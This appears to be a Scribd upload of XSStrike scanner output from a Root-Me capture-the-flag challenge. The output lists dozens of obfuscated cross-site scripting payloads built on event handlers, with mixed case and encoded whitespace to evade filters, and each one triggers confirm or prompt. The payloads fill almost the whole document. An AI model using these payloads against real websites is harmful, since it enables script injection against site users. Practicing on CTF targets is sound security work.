Scribd
Upload
66 views6 pages

IUHOHHOI

The document details the output of XSStrike v3.1.5, a tool used for testing web applications for DOM vulnerabilities. It identifies a potentially vulnerable parameter and generates 1536 payloads for testing, with various payloads showing different efficiencies and confidence levels. The WAF (Web Application Firewall) status is reported as offline, allowing for further testing of the identified vulnerabilities.

Uploaded by

roman.k.pro2
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
66 views6 pages

IUHOHHOI

The document details the output of XSStrike v3.1.5, a tool used for testing web applications for DOM vulnerabilities. It identifies a potentially vulnerable parameter and generates 1536 payloads for testing, with various payloads showing different efficiencies and confidence levels. The WAF (Web Application Firewall) status is reported as offline, allowing for further testing of the identified vulnerabilities.

Uploaded by

roman.k.pro2
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 6

 python3 xsstrike.py -u "http://challenge01.root-me.org/web-client/ch32/?

number=INJECT"

XSStrike v3.1.5

[~] Checking for DOM vulnerabilities


[+] Potentially vulnerable objects found
------------------------------------------------------------
6 document.getElementById('state').innerHTML = 'You won this game but you don\'t
have the flag ;)';
------------------------------------------------------------
[+] WAF Status: Offline
[!] Testing parameter: number
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 1536
------------------------------------------------------------
[+] Payload: <a/+/onMOusEovEr%0d=%0d[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/ONpointerenter%0d=%0d[8].find(confirm)//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%0doNmouseovEr%0a=%0a(prompt)``//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A%09onpoiNterEnTer+=+a=prompt,a()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0donMOuSeoveR%09=%09a=prompt,a()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%09onMoUsEover%0a=%0a(confirm)()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%09onmOuseover%0a=%0aconfirm()%0dx//v3dm0s
[!] Efficiency: 95
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a/+/oNmouseoVer%0a=%0a(prompt)``//v3dm0s
[!] Efficiency: 94
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0doNpoinTerenTer+=+[8].find(confirm)//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <DeTails%0dontoggLE%0d=%0d[8].find(confirm)%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v/+/onmousEOver%0a=%0aconfirm()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0dOnmousEoVEr%0d=%0d(prompt)``%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNmouseovER+=+[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%09onMouSeover%0d=%0d(confirm)()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%0doNmouseover+=+[8].find(confirm)//v3dm0s
[!] Efficiency: 95
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <htmL%0aONmouseover%0a=%0aconfirm()//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%0donMOUseover%09=%09a=prompt,a()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%09onmoUseover%09=%09(prompt)``%0dx//v3dm0s
[!] Efficiency: 95
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/onmOusEoveR%09=%09(prompt)``%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0aoNpoiNtEreNter%09=%09(confirm)()//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3V%09OnpointErenteR%0a=%0a[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0aonmoUsEover+=+confirm()%0dx//v3dm0s
[!] Efficiency: 94
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V/+/oNmouseoveR%0d=%0dconfirm()%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%0donPOiNterenter%0a=%0aconfirm()//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a/+/onmoUseovEr%09=%09a=prompt,a()%0dx//v3dm0s
[!] Efficiency: 95
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0doNMouSeoVer%09=%09[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNpointerEntEr+=+confirm()%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0aoNMouseOvEr%0a=%0a(confirm)()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNpOintEreNteR%0a=%0a[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A%0dOnmOuseover%0a=%0aconfirm()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <Html%09onmOusEover%0d=%0da=prompt,a()%0dx//
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A%0aonmouseOVeR%09=%09confirm()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%09OnmouSEOver+=+[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <DETails%09Ontoggle%0d=%0d[8].find(confirm)//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/onmouseOveR%0d=%0d(prompt)``//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/onPointereNtEr%09=%09[8].find(confirm)//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%0aOnmoUseoVer%09=%09(confirm)()//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <htMl%0donmouseOvER%0d=%0d[8].find(confirm)//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <DEtailS%0aoNtoggle+=+[8].find(confirm)%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0aonMouseoVer%09=%09confirm()%0dx//v3dm0s
[!] Efficiency: 94
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNmOUseover%0a=%0aconfirm()%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%0aonmouseovER%09=%09a=prompt,a()%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <D3v%0doNmouseoVEr%0d=%0da=prompt,a()//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <detaIls%0doNToggLe%0a=%0a[8].find(confirm)%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V%09oNmouSeover%09=%09confirm()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%09OnmOUSeover%09=%09(prompt)``%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%09oNmOuSeoveR%0d=%0d[8].find(confirm)//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNPointerentEr%0d=%0dconfirm()%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0donpOinTerenteR+=+confirm()%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0aonMoUsEoVer%09=%09confirm()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNpoInTerenter%0a=%0aa=prompt,a()%0dx//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/OnmouSeoveR%0a=%0a(confirm)()%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3V/+/OnmOuseover%0a=%0aa=prompt,a()//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A/+/onPointeREnter%0a=%0a(prompt)``//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <Details%0aoNtOGgle%0a=%0aa=prompt,a()%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0aOnmouSEovEr%09=%09(prompt)``%0dx//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v/+/onmOUSEover%09=%09a=prompt,a()//v3dm0s
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A%09onPointerenteR+=+a=prompt,a()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v%0aonMouseOvER%0a=%0a[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <detaIls%09ontoGgle%0a=%0a[8].find(confirm)%0dx//
[!] Efficiency: 95
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <dETAils%0aOntoggle%09=%09[8].find(confirm)%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <html/+/oNmouSEoVer%09=%09[8].find(confirm)%0dx//
[!] Efficiency: 91
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0aoNMoUseOver%0d=%0d[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%09onmOuSEover%0d=%0da=prompt,a()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0doNmoUseoVer%0d=%0d(prompt)``//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <d3v/+/ONmouseOver+=+confirm()%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a/+/onmousEovEr+=+confirm()//v3dm0s
[!] Efficiency: 93
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <a%0aonMousEoveR%09=%09a=prompt,a()//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <A%0aonmoUsEovEr%09=%09[8].find(confirm)%0dx//v3dm0s
[!] Efficiency: 92
[!] Confidence: 10
------------------------------------------------------------
[+] Payload: <hTml%09onmouseoVer%09=%09a=prompt,a()//
[!] Efficiency: 94
[!] Confidence: 10
~] Progress: 1536/1536

You might also like